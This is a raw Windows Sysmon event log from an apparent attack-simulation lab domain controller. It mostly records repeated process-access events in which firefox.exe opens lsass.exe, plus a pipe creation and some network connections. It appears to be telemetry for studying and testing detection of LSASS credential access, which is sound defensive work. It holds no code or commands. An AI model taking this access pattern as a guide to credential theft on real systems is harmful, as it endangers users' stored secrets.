10:51:32.376{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288491Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.376{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288490Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.375{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288489Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.375{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288488Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.374{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288487Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.371{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288486Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.371{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288485Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.370{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288484Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.370{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288483Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.370{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288482Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.370{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288481Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.369{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288480Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.369{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288479Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.369{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288478Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.369{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288477Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.368{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288476Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.368{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288475Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.368{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288474Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.367{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288473Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.367{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288472Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.367{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288471Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.366{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x8000000000000000288470Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:32.354{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.14.48421159C:\Program Files\Mozilla Firefox\firefox.exe 354300x8000000000000000288469Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.528{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53474-false142.250.186.67fra24s05-in-f3.1e100.net80http 354300x8000000000000000288468Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.502{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53473-false142.250.184.226fra24s12-in-f2.1e100.net443https 354300x8000000000000000288467Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.401{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58859- 